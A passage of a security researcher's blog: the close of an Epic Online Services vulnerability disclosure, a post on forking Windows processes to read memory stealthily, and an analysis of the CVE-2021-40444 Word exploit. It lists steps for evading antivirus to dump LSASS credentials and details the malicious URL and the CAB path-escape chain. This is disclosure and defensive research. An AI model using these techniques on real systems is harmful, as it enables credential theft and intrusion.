  5. The claim that the Session Hijacking issue cannot be remediated because "P2P is inherently insecure" is simply not true. It's not like you can't trust the central EOS-API server.  Here is what Epic could do to remediate the Session Hijacking vulnerability:
  • A large requirement about the session hijacking attack is that an attacker must create multiple duplicate sessions that match the given attributes. An effective remediation is to limit the number of concurrent sessions a single user can have at once.
  • To prevent attackers from using multiple accounts to hijack a session to a singular session, Epic Games could enforce that the product user ID stored in the session must match the product user ID of the token the client is authenticating with.
  • To be clear, if Epic Games applied my suggested path of remediation, an attacker could still buy 10-20 copies of the game on different accounts to perform the attack on a small-scale. A large-scale attack would require thousands of copies to create enough fake hijacking sessions.
  • The point with this path of remediation is that it would significantly reduce the exploitability of this vulnerability, much more than a single layer of authentication provides.

Epic Games has yet to comment on these suggestions.

But... why?

When I first came across the design flaw that peer-to-peer games are required to embed GameServer credentials, I was curious to how such a fundamental flaw could have gotten past the initial design stage and decided to investigate.

After comparing the EOS landing page from its initial release in 2019 to the current page, it turns out that peer-to-peer functionality was not in the original release of Epic Online Services, but the GameClient and GameServer authentication model was!

It appears as though Epic Games simply didn't consider adding a new role dedicated for peer-to-peer hosts when designing the peer-to-peer functionality of the EOS-API.

Timeline

The timeline for this vulnerability is the following:

07/23/2020 - The vulnerability is reported to Epic Games.
07/28/2020 - The vulnerability is reproduced by HackerOne's triage team.
08/11/2020 - The vulnerability is officially triaged by Epic Games.
08/20/2020 - A disclosure timeline of 135 days is negotiated (for release in December 2020).
11/08/2020 - New impact/attack scenarios that are a result of this vulnerability are shared with Epic Games.
12/02/2020 - The vulnerability severity is escalated to Critical.
12/03/2020 - This publication is shared with Epic Games for review.
12/17/2020 - This publication is released to the public.

Frequently Asked Questions

Am I vulnerable?
If your game uses Epic Online Services, specifically its peer-to-peer or session/matchmaking functionality, you are likely vulnerable to some of the issues discussed in this article.

Epic Games has not remediated several issues discussed; opting to provide warnings in documentation instead of fixing the underlying problems in their platform.

What do I do if I am vulnerable?
If you're a player of the game, reach out to the game developers.

If you're a game or library developer, reach out to Epic Games for assistance. Make sure to review the documentation warnings Epic Games has added due to this vulnerability.

What is the potential impact of these vulnerabilities?
The vulnerabilities discussed in this article could be used to:

  1. Hijack any or all "matchmaking sessions" and have any player that joins a session join an attacker's session instead.
  2. Prevent players from joining any "matchmaking session".
  3. Leak the user identifier and IP Address of any player hosting a session.

Abusing Windows’ Implementation of Fork() for Stealthy Memory Operations

26 November 2021 at 04:32
Abusing Windows’ Implementation of Fork() for Stealthy Memory Operations

Note: Another researcher recently tweeted about the technique discussed in this blog post, this is addressed in the last section of the blog (warning, spoilers!).

To access information about a running process, developers generally have to open a handle to the process through the OpenProcess API specifying a combination of 13 different process access rights:

  1. PROCESS_ALL_ACCESS - All possible access rights for a process.
  2. PROCESS_CREATE_PROCESS - Required to create a process.
  3. PROCESS_CREATE_THREAD - Required to create a thread.
  4. PROCESS_DUP_HANDLE - Required to duplicate a handle using DuplicateHandle.
  5. PROCESS_QUERY_INFORMATION - Required to retrieve general information about a process such as its token, exit code, and priority class.
  6. PROCESS_QUERY_LIMITED_INFORMATION - Required to retrieve certain limited information about a process.
  7. PROCESS_SET_INFORMATION - Required to set certain information about a process such as its priority.
  8. PROCESS_SET_QUOTA - Required to set memory limits using SetProcessWorkingSetSize.
  9. PROCESS_SUSPEND_RESUME - Required to suspend or resume a process.
  10. PROCESS_TERMINATE - Required to terminate a process using TerminateProcess.
  11. PROCESS_VM_OPERATION - Required to perform an operation on the address space of a process (VirtualProtectEx, WriteProcessMemory).
  12. PROCESS_VM_READ - Required to read memory in a process using ReadProcessMemory.
  13. PROCESS_VM_WRITE - Required to write memory in a process using WriteProcessMemory.

The access rights requested will impact whether or not a handle to the process is returned. For example, a normal process running under a standard user can open a SYSTEM process for querying basic information, but it cannot open that process with a privileged access right such as PROCESS_VM_READ.

In the real world, the importance of process access rights can be seen in the restrictions anti-virus and anti-cheat products place on certain processes. An anti-virus might register a process handle create callback to prevent processes from opening the Local Security Authority Subsystem Service (LSASS) which could contain sensitive credentials in its memory. An anti-cheat might prevent processes from opening the game they are protecting, because cheaters can access key regions of the game memory to gain an unfair advantage.

When you look at the thirteen process access rights, do any of them strike out as potentially malicious? I investigated that question by taking a look at the drivers for several anti-virus products. Specifically, what access rights did they filter for in their process handle create callbacks? I came up with this subset of access rights that were often directly associated with potentially malicious operations: PROCESS_ALL_ACCESS, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE, PROCESS_SET_INFORMATION, PROCESS_SUSPEND_RESUME, PROCESS_TERMINATE, PROCESS_VM_OPERATION, PROCESS_VM_READ, and PROCESS_VM_WRITE.

This leaves four other access rights that were discovered to be largely ignored:

  1. PROCESS_QUERY_INFORMATION - Required to retrieve general information about a process such as its token, exit code, and priority class.
  2. PROCESS_QUERY_LIMITED_INFORMATION - Required to retrieve certain limited information about a process.
  3. PROCESS_SET_QUOTA - Required to set memory limits using SetProcessWorkingSetSize.
  4. PROCESS_CREATE_PROCESS - Required to create a process.

These access rights were particularly interesting because if we could find a way to abuse any of them, we could potentially evade the detection of a majority of anti-virus products.

Most of these remaining rights cannot modify important aspects of a process. PROCESS_QUERY_INFORMATION and PROCESS_QUERY_LIMITED_INFORMATION are purely for reading informational details about a process. PROCESS_SET_QUOTA does impact the process, but does not provide much surface to abuse. For example, being able to set a processes' performance limits provides limited usefulness in an attack.

What about PROCESS_CREATE_PROCESS? This access right allows a caller to "create a process" using the process handle, but what does that mean?

In practice, someone with a process handle containing this access right can create processes on behalf of that process. In the following sections, we will explore existing techniques that abuse this access right and its undiscovered potential.

Parent Process Spoofing

An existing evasion technique called "parent process ID spoofing" is used when a malicious application would like to create a child process under a different process. This allows an attacker to create a process while having it appear as if it was launched by another legitimate application.

At a high-level, common implementations of parent process ID spoofing will:

  1. Call InitializeProcThreadAttributeList to initialize an attribute list for the child process.
  2. Use OpenProcess to obtain a PROCESS_CREATE_PROCESS handle to the fake parent process.
  3. Update the previously initialized attribute list with the parent process handle using UpdateProcThreadAttribute.
  4. Create the child process with CreateProcess, passing extended startup information containing the process attributes.

This technique provides more usefulness than just being able to spoof the parent process of a child. It can be used to attack the parent process itself as well.

When creating a process, if the attacker specifies TRUE for the InheritHandles argument, all inheritable handles present in the parent process will be given to the child. For example, if a process has an inheritable thread handle and an attacker would like to obtain this handle indirectly, the attacker can abuse parent process spoofing to create their own malicious child process which inherits these handles.

The malicious child process would then be able to abuse these inherited handles in an attack against the parent process, such as a child using asynchronous procedure calls (APCs) on the parent's thread handle. Although this variation of the technique does require that the parent have critical handles set to be inheritable; several common applications, such as Firefox and Chrome, have inheritable thread handles.

Ways to Create Processes

The previous section explored one existing attack that used the high-level kernel32.dll function CreateProcess, but this is not the only way to create a process. Kernel32 provides abstractions such as CreateProcess which allow developers to avoid having to use ntdll functions directly.

When taking a look under the hood, kernel32 uses ntdll functions and does much of the heavy lifting required to perform NtXx calls. CreateProcess uses NtCreateUserProcess, which has the following function prototype:

NTSTATUS NTAPI
NtCreateUserProcess (
    PHANDLE ProcessHandle,
    PHANDLE ThreadHandle,
    ACCESS_MASK ProcessDesiredAccess,
    ACCESS_MASK ThreadDesiredAccess,
    POBJECT_ATTRIBUTES ProcessObjectAttributes,
    POBJECT_ATTRIBUTES ThreadObjectAttributes,
    ULONG ProcessFlags,
    ULONG ThreadFlags,
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters,
    PPROCESS_CREATE_INFO CreateInfo,
    PPROCESS_ATTRIBUTE_LIST AttributeList
    );

NtCreateUserProcess is not the only low-level function exposed to create processes. There are two legacy alternatives: NtCreateProcess and NtCreateProcessEx. Their function prototypes are:

NTSTATUS NTAPI
NtCreateProcess (
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ParentProcess,
    BOOLEAN InheritObjectTable,
    HANDLE SectionHandle,
    HANDLE DebugPort,
    HANDLE ExceptionPort
    );

NTSTATUS NTAPI
NtCreateProcessEx (
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ParentProcess,
    ULONG Flags,
    HANDLE SectionHandle,
    HANDLE DebugPort,
    HANDLE ExceptionPort,
    BOOLEAN InJob
    );

NtCreateProcess and NtCreateProcessEx are quite similar but offer a different route of process creation when compared to NtCreateUserProcess.

Forking Your Own Process

A lesser documented limited technique available to developers is the ability to fork processes on Windows. The undocumented function developers can use to fork their own process is RtlCloneUserProcess. This function does not directly call the kernel and instead is a wrapper around NtCreateUserProcess.

A minimal implementation of forking through NtCreateUserProcess can be achieved trivially. By calling NtCreateUserProcess with NULL for both object attribute arguments, NULL for the process parameters, an empty (but not NULL) create info argument, and a NULL attribute list; a fork of the current process will be created.

One question that arose when performing this research was: What is the difference between forking a process and creating a new process with handles inherited? Interestingly, the minimal forking mechanism present in Windows does not only include inheritable handles, but private memory regions too. Any dynamically allocated pages as part of the parent will be accessible at the same location in the child as well.

Both RtlCloneUserProcess and the minimal implementation described are publicly known techniques for simulating fork on Windows, but is there any use forking provides to an attacker?

In 2019, Microsoft Research Labs published a paper named "A fork() in the road", which discussed how what used to be a "clever hack" has "long outlived its usefulness and is now a liability". The paper discusses several areas, such as how fork is a "terrible abstraction" and how it compromises OS implementations. The section titled "FORK IN THE MODERN ERA" is particularly relevant:

Fork is insecure. By default, a forked child inherits everything from its parent, and the programmer is responsible for explicitly removing state that the child does not need by: closing file descriptors (or marking them as close-on-exec), scrubbing secrets from memory, isolating namespaces using unshare() [52], etc. From a security perspective, the inherit by-default behaviour of fork violates the principle of least privilege.

This section covers the security risk that is posed by the ability to fork processes. Microsoft provides the example that a forked process "inherits everything from its parent" and that "the programmer is responsible for explicitly removing state that the child does not need". What happens when the programmer is a malicious attacker?

Forking a Remote Process

I propose a new method of abusing the limited fork functionality present in Windows. Instead of forking your own process, what if you forked a remote process? If an attacker could fork a remote process, they would be able to gain insight into the target process without needing a sensitive process access right such as PROCESS_VM_READ, which could be monitored by anti-virus.

With only a PROCESS_CREATE_PROCESS handle, an attacker can fork or "duplicate" a process and access any secrets that are present in it. When using the legacy NtCreateProcess(Ex) variant, forking a remote process is relatively simple.

By passing NULL for the SectionHandle and a PROCESS_CREATE_PROCESS handle of the target for the ParentProcess arguments, a fork of the remote process will be created and an attacker will receive a handle to the forked process. Additionally, as long as the attacker does not create any threads, no process creation callbacks will fire. This means that an attacker could read the sensitive memory of the target and anti-virus wouldn't even know that the child process had been created.

When using the modern NtCreateUserProcess variant, all an attacker needs to do is use the previous minimal implementation of forking your own process but pass the target process handle as a PsAttributeParentProcess in the attribute list.

With the child handle, an attacker could read sensitive memory from the target application for a variety of purposes. In the following sections, we'll cover approaches to detection and an example of how an attacker could abuse this in a real attack.

Example: Anti-Virus Tampering

Some commercial anti-virus solutions may include self-integrity features designed to combat tampering and information disclosure. If an attacker could access the memory of the anti-virus process, it is possible that sensitive information about the system or the anti-virus itself could be abused.

With Process Forking, an attacker can gain access to both private memory and inheritable handles with only a PROCESS_CREATE_PROCESS handle to the victim process. A few examples of attacks include:

  1. An attacker could read the encryption keys that are used to communicate with a trusted anti-virus server to decrypt or potentially tamper with this line of communication. For example, an attacker could pose as a man-in-the-middle (MiTM) with these encryption keys to prevent the anti-virus client from communicating alerts or spoof server responses to further tamper with the client.
  2. An attacker could gain access to sensitive information about the system that was provided by the kernel. This information could include data from kernel callbacks that an attacker otherwise would not have access to from usermode.
  3. An attacker could gain access to any handle the anti-virus process holds that is marked as inheritable. For example, if the anti-virus protects certain files from being accessed, such as sensitive configuration files, an attacker may be able to inherit a handle opened by the anti-virus process itself to access that protected file.

Example: Credential Dumping

One obvious target for a stealthy memory reading technique such as this is the Local Security Authority Subsystem Service (LSASS). LSASS is often the target of attackers that wish to capture the credentials for the current machine.

In a typical attack, a malicious program such as Mimikatz directly interfaces with LSASS on the victim machine, however, a stealthier alternative has been to dump the memory of LSASS for processing on an attacker machine. This is to avoid putting a well-known malicious program such as Mimikatz on the victim environment which is much more likely to be detected.

With Process Forking, an attacker can evade defensive solutions that monitor or prevent access to the LSASS process by dumping the memory of an LSASS fork instead:

  1. Set debug privileges for your current process if you are not already running as SYSTEM.
  2. Open a file to write the memory dump to.
  3. Create a fork child of LSASS.
  4. Use the common MiniDumpWriteDump API on the forked child.
  5. Exfiltrate the dump file to an attacker machine for further processing.

Proof of Concept

A simple proof-of-concept utility and library have been published on GitHub.

Conclusion

Process Forking still requires that an attacker would have access to the victim process in the default Windows security model. Process Forking does not break integrity boundaries and attackers are restricted to processes running at the same privilege level they are. What Process Forking does offer is a largely ignored alternative to handle rights that are known to be potentially malicious.

Remediation may be difficult depending on the context of the solution relying on handle callbacks. An anti-cheat defending a single process may be able to get away with stripping PROCESS_CREATE_PROCESS handles entirely, but anti-virus solutions protecting multiple processes attempting a similar fix could face compatibility issues. It is recommended that vendors who opt to strip this access right initially audit its usage within customer environments and limit the processes they protect as much as possible.

Didn't I see this on Twitter yesterday?

Did you know that it is possible to read memory using a PROCESS_CREATE_PROCESS handle? Just call NtCreateProcessEx to clone the target process (and its entire address space), and then read anything you want from there.😎

— diversenok (@diversenok_zero) November 25, 2021

Yesterday morning, I saw this interesting tweet from @diversenok_zero explaining the same method discussed in this blog post.

One approach I like to take with new research or methods I find that I haven't investigated thoroughly yet is to generate a SHA256 hash of the idea and then post it somewhere publicly where the timestamp is recorded. This way, in cases like this where my research conflicts with what another researcher was working on, I can always prove I discovered the trick on a certain date. In this case, on June 19th 2021, I posted a public GitHub gist of the following SHA256 hash:

D779D38405E8828F5CB27C2C3D75867C6A9AA30E0BD003FECF0401BFA6F9C8C7
You can read the memory of any process that you can open a PROCESS_CREATE_PROCESS handle to by calling NtCreateProcessEx using the process handle as the ParentHandle argument and providing NULL for the section argument.

If you generate a SHA256 hash of the quote above, you'll notice it matches the one I publicly posted back in June.

I have been waiting to publish this research because I am currently in the process of responsibly disclosing the issue to vendors whose products are impacted by this attack. Since the core theory of my research was shared publicly by @diversenok_zero, I decided it would be alright to share what I found around the technique as well.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit

7 January 2022 at 09:18
Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit

In the middle of August 2021, a special Word document was uploaded to VirusTotal by a user from Argentina. Although it was only detected by a single antivirus engine at the time, this sample turned out to be exploiting a zero day vulnerability in Microsoft Office to gain remote code execution.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit

Three weeks later, Microsoft published an advisory after being notified of the exploit by researchers from Mandiant and EXPMON. It took Microsoft nearly a month from the time the exploit was first uploaded to VirusTotal to publish a patch for the zero day.

In this blog post, I will be sharing my in-depth analysis of the several vulnerabilities abused by the attackers, how the exploit was patched, and how to port the exploit for a generic Internet Explorer environment.

First Look

A day after Microsoft published their advisory, I saw a tweet from the malware collection group @vxunderground offering a malicious payload for CVE-2021-40444 to blue/red teams.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit

I reached out to receive a copy, because why not? My curiosity has generally lead me in the right direction for my life and I was interested in seeing a Microsoft Word exploit that had been found in the wild.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit

With the payload in hand, one of the first steps I took was placing it into an isolated virtual machine with basic dynamic analysis tooling. Specifically, one of my favorite network monitoring utilities is Fiddler, a freemium tool that allows you to intercept web requests (including encrypted HTTPS traffic).

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit

After I opened the malicious Word document, Fiddler immediately captured strange HTTP requests to the domain, "hidusi[.]com". For some reason, the Word document was making a request to "http://hidusi[.]com/e8c76295a5f9acb7/side.html".

At this point, the "hidusi[.]com" domain was already taken down. Fortunately, the "side.html" file being requested was included with the sample that was shared with me.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit

Unfortunately, the HTML file was largely filled with obfuscated JavaScript. Although I could immediately decrypt this JavaScript and go from there, this is generally a bad idea to do at an early stage because we have no understanding of the exploit.

Reproduction

Whenever I encounter a new vulnerability that I want to reverse engineer, my first goal is always to produce a minimal reproduction example of the exploit to ensure I have a working test environment and a basic understanding of how the exploit works. Having a reproduction case is critical to reverse engineering how the bug works, because it allows for dynamic analysis.

Since the original "hidusi[.]com" domain was down, we needed to host our version of side.html. Hosting a file is easy, but how do we make the Word document use our domain instead? It was time to find where the URL to side.html was hidden inside the Word document.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Raw Bytes of "A Letter before court 4.docx"
Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Extracted Contents of "A Letter before court 4.docx"

Did you know that Office documents are just ZIP files? As we can see from the bytes of the malicious document, the first few bytes are simply the magic value in the ZIP header.

Once I extracted the document as a ZIP, finding the URL was relatively easy. I performed a string search across every file the document contained for the domain "hidusi[.]com".

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Hidusi[.]com found under word/_rels/document.xml.rels

Sure enough, I found one match inside the file "word/_rels/document.xml.rels". This file is responsible for defining relationships associated with embedded objects in the document.

OLE objects are part of Microsoft's proprietary Object Linking and Embedding technology, which allows external documents, such as an Excel spreadsheet, to be embedded within a Word document.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Strange Target for OLE Object

The relationship that contained the malicious URL was an external OLE object with a strange "Target" attribute containing the "mhtml" protocol. Let's unpack what's going on in this value.

  1. In red, we see the URL Protocol "mhtml".
  2. In green, we see the malicious URL our proxy caught.
  3. In blue, we see an interesting "!x-usc" suffix appended to the malicious URL.
  4. In purple, we see the same malicious URL repeated.

Let's investigate each piece one-by-one.

Reproduction: What's "MHTML"?

A useful tool I've discovered in past research is URLProtocolView from Nirsoft. At a high level, URLProtocolView allows you to list and enumerate the URL protocols installed on your machine.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
The MHTML Protocol in URLProtocolView

The MHTML protocol used in the Target attribute was a Pluggable Protocol Handler, similar to HTTP. The inetcomm.dll module was responsible for handling requests to this protocol.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
The HTTP* Protocols in URLProtocolView

Unlike MHTML however, the HTTP protocol is handled by the urlmon.dll module.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit

When I was researching past exploits involving the MHTML protocol, I came across an interesting article all the way back from 2011 about CVE-2011-0096. In this case, a Google engineer publicly disclosed an exploit that they suspected malicious actors attributed to China had already discovered. Similar to this vulnerability, CVE-2021-0096 was only found to be used in "very targeted" attacks.

When I was researching implementations of exploits for CVE-2011-0096, I came across an exploit-db release that included an approach for abusing the vulnerability through a Word document. Specifically, in part #5 and #6 of the exploit, this author discovered that CVE-2011-0096 could be abused to launch executables on the local machine and read the contents of the local filesystem. The interesting part here is that this 2011 vulnerability involved abusing the MHTML URL protocol and that it allowed for remote code execution via a Word document, similar to the case with CVE-2021-4044.

Reproduction: What about the "X-USC" in the Target?

Going back to our strange Target attribute, what is the "!x-usc:" portion for?

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit

I found a blog post from 2018 by @insertScript which discovered that the x-usc directive was used to reference an external link. In fact, the example URL given by the author still works on the latest version of Internet Explorer (IE). If you enter "mhtml:http://google.com/whatever!x-usc:http://bing.com" into your IE URL bar while monitoring network requests, there will be both a request to Google and Bing, due to the "x-usc" directive.

In the context of CVE-2021-40444, I was unable to discover a definitive answer for why the same URL was repeated after an "x-usc" directive. As we'll see in upcoming sections, the JavaScript in side.html is executed regardless of whether or not the attribute contains the "x-usc" suffix. It is possible that due to some potential race conditions, this suffix was added to execute the exploit twice to ensure successful payload delivery.

Reproduction: Attempting to Create my Own Payload

Now that we know how the remote side.html page is triggered by the Word document, it was time to try and create our own. Although we could proceed by hosting the same side.html payload the attackers used in their exploit, it is important to produce a minimal reproduction example first.

Instead of hosting the second-stage side.html payload, I opted to write a barebone HTML page that would indicate JavaScript execution was successful. This way, we can understand how JavaScript is executed by the Word document before reverse engineering what the attacker's JavaScript does.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Test Payload to Prove JS Execution

In the example above, I created an HTML page that simply made an XMLHttpRequest to a non-existent domain. If the JavaScript is executed, we should be able to see a request to "icanseethisrequestonthenetwork.com" inside of Fiddler.

Before testing in the actual Word document, I verified as a sanity check that this page does make the web request inside of Internet Explorer. Although the code may seem simple enough to where it would "obviously work", performing simple sanity checks like these on fundamental assumptions you make can greatly save you time debugging future issues. For example, if you don't verify a fundamental assumption and continue with reverse engineering, you could spend hours debugging the wrong issue when in fact you were missing a basic mistake.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Modified Relationship with Barebone Payload
Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Network Requests After Executing Modified Document

Once I patched the original Word document with my modified relationship XML, I launched it inside my VM with the Fiddler proxy running. I was seeing requests to the send_request.html payload! But... there were no requests to "icanseethisonthenetwork.com". We have demonstrated a flaw in our fundamental assumption that whatever HTML page we point the MHTML protocol towards will be executed.

How do you debug an issue like this? One approach would be to go in blind and try to reverse engineer the internals of the HTML engine to see why JavaScript wasn't being executed. The reason this is not a great idea is because often these codebases can be massive, and it would be like finding a needle in a haystack.

What can we do instead? Create a minimally viable reproduction case where the JavaScript of the HTML is executed. We know that the attacker's payload must have worked in their attack. What if instead of writing our own payload first, we tried to host their payload instead?

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Network Requests After Executing with Side.html Payload

I uploaded the attacker’s original "side.html" payload to my server and replaced the relationship in the Word document with that URL. When I executed this modified document in my VM, I saw something extremely promising- requests for "ministry.cab". This means that the attacker's JavaScript inside side.html was executed!

We have an MVP payload that gets executed by the Word document, now what? Although we could ignore our earlier problem with our own payload and try to figure out what the CAB file is used for directly, we'd be skipping a crucial step of the exploit. We want to understand CVE-2021-40444, not just reproduce it.

With this MVP, we can now try to debug and reverse engineer the question, "Why does the working payload result in JavaScript execution, but not our own sample?".

Reproduction: Reverse Engineering Microsoft’s HTML Engine

The primary module responsible for processing HTML in Windows is MSHTML.DLL, the "Microsoft HTML Viewer". This binary alone is 22 MB, because it contains almost everything from rendering HTML to executing JavaScript. For example, Microsoft has their own JavaScript engine in this binary used in Internet Explorer (and Word).

Given this massive size, blindly reversing is a terrible approach. What I like to do instead is use ProcMon to trace the execution of the successful (document with side.html) and failing payload (document with barebone HTML), then compare their results. I executed the attacker payload document and my own sample document while monitoring Microsoft Word with ProcMon.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Microsoft Word Loading JScript9.dll in Success Case

With the number of operations an application like Microsoft Office makes, it can be difficult to sift through the noise. The best approach I have for this problem is to use my context to find relevant operations. In this case, since we were looking into the execution of JavaScript, I looked for operations involving the word “script”.

You might think, what can we do with relevant operations? An insanely useful feature of ProcMon is the ability to see the caller stack for a given operation. This lets you see what executed the operation.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Stack Trace of JScript9.dll Module Load
Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
IDA Pro Breakpoint on PostManExecute

It looked like the PostManExecute function was primary responsible for triggering the complete execution of our payload. Using IDA Pro, I set a breakpoint on this function and opened both the successful/failing payloads.

I found that when the success payload was launched, PostManExecute would be called, and the page would be loaded. On the failure case however, PostManExecute was not called and thus the page was never executed. Now we needed to figure out why is PostManExecute being invoked for the attacker’s payload but not ours?

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Partial Stack Trace of JScript9.dll Module Load

Going back to the call stack, what’s interesting is that PostManExecute seems to be the result of a callback that is being invoked in an asynchronous thread.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
X-Refs to CDwnChan::OnMethodCall from Call Stack

Looking at the cross references for the function called right after the asynchronous dispatcher, CDwnChan::OnMethodCall, I found that it seemed to be queued in another function called CDwnChan::Signal.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Asynchronous Execution of CDwnChan::OnMethodCall inside CDwnChan::Signal
Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
X-Refs to CDwnChan::Signal

CDwnChan::Signal seemed to be using the function "_GWPostMethodCallEx" to queue the CDwnChan::OnMethodCall to be executed in the asynchronous thread we saw. Unfortunately, this Signal function is called from many places, and it would be a waste of time to try to statically reverse engineer every reference.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
X-Refs to Asynchronous Queue'ing Function __GWPostMethodCallEx

What can we do instead? Looking at the X-Refs for _GWPostMethodCallEx, it seemed like it was used to queue almost everything related to HTML processing. What if we hooked this function and compared the different methods that were queued between the success and failure path?

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit

Whenever __GWPostMethodCallEx was called, I recorded the method being queued for asynchronous execution and the call stack. The diagram above demonstrates the methods that were queued during the execution of the successful payload and the failing payload. Strangely in the failure path, the processing of the HTML page was terminated (CDwnBindData::TerminateOnApt) before the page was ever executed.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Callstack for CDwnBindData::TerminateOnApt

Why was the Terminate function being queued before the OnMethodCall function in the failure path? The call stacks for the Terminate function matched between the success and failure paths. Let’s reverse engineer those functions.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Partial Pseudocode of CDwnBindData::Read

When I debugged the CDwnBindData::Read function, which called the Terminate function, I found that a call to CDwnStm::Read was working in the success path but returning an error in the failure path. This is what terminated the page execution for our sample payload!

The third argument to CDwnStm::Read was supposed to be the number of bytes the client should try to read from the server. For some reason, the client was expecting 4096 bytes and my barebone HTML file was not that big.

As a sanity check, I added a bunch of useless padding to the end of my HTML file to make its size 4096+ bytes. Let’s see our network requests with this modified payload.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Modified Barebone HTML with Padding to 4096 bytes
Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Network Requests of Barebone Word Document

We had now found and fixed the issue with our barebone HTML page! But our work isn't over yet. We wouldn’t be great reverse engineers if we didn’t investigate why the client was expecting 4096 bytes in the first place.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Partial Pseudocode of CHtmPre::GetReadRequestSize

I traced back the origin of the expected size to a call in CHtmPre::Read to CHtmPre::GetReadRequestSize. Stepping through this function in a debugger, I found that a field at offset 136 of the CHtmPre class represented the request size the client should expect. How can we find out why this value is 4096? Something had to write to it at some point.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Partial Pseudocode of CHtmPre Constructor

Since we were looking at a class function of the CHtmPre class, I set a breakpoint on the constructor for this class. When the debugger reached the constructor, I placed a write memory breakpoint for the field offset we saw (+ 136).

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Partial Pseudocode of CEncodeReader Constructor when the Write Breakpoint Hit

The breakpoint hit! And not so far away either. The 4096 value was being set inside of another object constructor, CEncodeReader::CEncodeReader. This constructor was instantiated by the CHtmPre constructor we just hooked. Where did the 4096 come from then? It was hardcoded into the CHtmPre constructor!

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Partial Pseudocode of CHtmPre Constructor, Highlighting Hardcoded 4096 Value

What was happening was that when the CHtmPre instance was constructed, it had a default read size of 4096 bytes. The client was reading the bytes from the HTTP response before this field was updated with the real response size. Since our barebone payload was just a small HTML page under 4096 bytes, the client thought that the server hadn’t sent the required response and thus terminated the execution.

The reason the attacker's payload worked is because it was above 4096 bytes in size. We just found a bug still present in Microsoft’s HTML processor!

Reproduction: Fixing the Attacker's Payload

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Network Requests After Executing with Side.html Payload

We figured out how to make sure our payload executes. If you recall to an earlier section of this blog post, we saw that a request to a "ministry.cab" file was being made by the attacker's side.html payload. Fortunately for us, the attacker’s sample came with the CAB file the server was originally serving.

This CAB file was interesting. It had a single file named "../msword.inf", suggesting a relative path escape attack. This INF file was a PE binary for the attacker’s Cobalt Strike beacon. I replaced this file with a simple DLL that opened Calculator for testing. Unfortunately, when I uploaded this CAB file to my server, I saw a successful request to it but no Calculator.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Operations involving msword.inf from CAB file
Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Call stack of msword.inf Operation

I monitored Word with ProcMon once again to try and see what was happening with the CAB file. I filtered for "msword.inf" and found interesting operations where Word was writing it to the VM user's %TEMP% directory. The "VerifyTrust" function name in the call stack suggested that the INF file was written to the TEMP directory while it was trying to verify its signature.

Let's step through these functions to figure out what's going on.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
Partial Pseudocode of Cwvt::VerifyTrust

After stepping through Cwvt::VerifyTrust with a debugger, I found that the function attempted to verify the signature of files contained within the CAB file. Specifically, if the CAB file included an INF file, it would extract it to disk and try to verify its digital signature.

What was happening was that the extraction process didn't have any security measures, allowing for an attacker to use relative path escapes to get out of the temporary directory that was generated for the CAB file.

The attackers were using a zero-day with ActiveX controls:

  1. The attacker’s JavaScript (side.html) would attempt to execute the CAB file as an ActiveX control.
  2. This triggered Microsoft’s security controls to verify that the CAB file was signed and safe to execute.
  3. Unfortunately, Microsoft handled this CAB file without care and although the signature verification fails, it allowed an attacker to extract the INF file to another location with relative path escapes.

If there was a user-writable directory where if you could put a malicious INF file, it would execute your malware, then they could have stopped here with their exploit. This isn’t a possibility though, so they needed some way to execute the INF file as a PE binary.

